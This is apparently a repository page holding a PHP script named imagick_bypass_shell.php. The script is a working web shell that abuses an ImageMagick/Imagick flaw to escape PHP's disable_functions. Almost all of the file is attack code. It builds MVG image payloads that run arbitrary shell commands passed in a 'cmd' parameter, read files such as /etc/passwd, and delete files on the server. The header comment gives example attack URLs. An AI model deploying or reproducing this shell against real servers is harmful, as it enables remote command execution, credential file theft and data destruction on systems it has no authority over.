-
Notifications
You must be signed in to change notification settings - Fork 33
/
imagick_bypass_shell.php
159 lines (138 loc) · 6.19 KB
/
imagick_bypass_shell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
<?php
/*
PHP Imagick disable_functions Bypass
Version: Imagick <= 3.3.0 PHP >= 5.4
Original Author: Ricter <[email protected]>
New Author: Hood3dRob1n
Exec Command: http://site.com/imagick.php?cmd=id
Read File: http://site.com/imagick.php?read=/etc/passwd
Delete File: http://site.com/imagick.php?del=/tmp/removeme.txt
.
..
...
Installation of Imagemagick (Debian/Ubuntu):
apt-get install libmagickwand-dev imagemagick
pecl install imagick
echo "extension=imagick.so" >> /etc/php5/apache2/php.ini
sudo apt-get install php5-imagick
service apache2 restart
...
..
.
*/
echo "<html><head></head><body>";
# Confirm Imagemagick library is installed and loaded, or bail...
if (extension_loaded('imagick')) {
echo "<b>[*]</b> Imagick is installed<br/>";
# Display disabled_functions() results...
echo "<b>Disabled functions:</b><br/><pre>" . ini_get("disable_functions") . "</pre><br/>";
# Get Command from User
if(isset($_REQUEST['cmd'])) {
$command = $_REQUEST['cmd'];
echo "<b>[*] Command:</b> " . $command . "<br/><pre>";
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will be our decoy convert output file
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->writeImage($results_file); # (Try) Write back to disk, triggering convert rce
$thumb->clear(); # Cleanup
$thumb->destroy();
# Show the command output to the user
echo file_get_contents($data_file);
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "</pre>";
}
# Get file to read
if(isset($_REQUEST['read'])) {
$f2read = $_REQUEST['read'];
echo "<b>[*] File Requested:</b> " . $f2read . "<br/><br/>";
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will render our file content
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@$f2read'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->setImageFormat('jpeg'); # Set output type to .jpeg so we can load it properly
$thumb->writeImage($results_file); # Write back to disk, triggering convert rendering content to output image
$thumb->clear(); # Cleanup
$thumb->destroy();
if(is_file($results_file)) {
# Show the command output to the user (use data:// so we can delete file)
$bcontent = base64_encode(file_get_contents($results_file));
echo "<img src=\"data:image/jpeg;base64,$bcontent\"/>";
} else {
echo "<b>[x] Error Converting Image</b>.....";
}
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "<br/>";
}
# Get file to Delete
if(isset($_REQUEST['del'])) {
$f2delete = $_REQUEST['del'];
if(!is_file($f2delete)) {
echo "<b>[x] File Requested to Delete Doesn't Exist!</b>....<br/><br/>";
echo "<b>[x] Try again with another file....<br/><br/>";
} else {
echo "<b>[*] File Requested to Delete:</b> " . $f2delete . "<br/><br/>";
$data_file = tempnam('/tmp', 'img'); # placeholder to catch command output
$imagick_file = tempnam('/tmp', 'img'); # this will serve as our payload file
$results_file = tempnam('/tmp', 'img'); # This will be our decoy convert output file
# Build the payload, as the actual internal image content directive
# This is what gets parsed and passed to command line call (i.e. /usr/bin/convert)
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:$f2delete'
pop graphic-context
EOF;
# Read & Write to trigger the underlying convert call, which triggers command...
file_put_contents("$imagick_file", $exploit); # Write the payload to payload file
$thumb = new Imagick(); # Initialize Imagemagick
$thumb->readImage("$imagick_file"); # Read in the evil image payload
$thumb->writeImage($results_file); # Write back to disk, triggering convert rendering content to output image
$thumb->clear(); # Cleanup
$thumb->destroy();
if(is_file($f2delete)) {
echo "<b>[x] File was NOT Deleted!</b>....<br/><br/>";
echo "<b>[x] Might be permissions issue, idk....<br/><br/>";
} else {
echo "<b>[*] File Deleted Successfully!</b><br/><br/>";
}
# Remove files
unlink("$data_file");
unlink("$imagick_file");
unlink("$results_file");
echo "<br/>";
}
}
} else {
echo "<font='red'><b>[x]</b> Imagick is NOT Loaded!</font>";
}
echo "</body></html>";
?>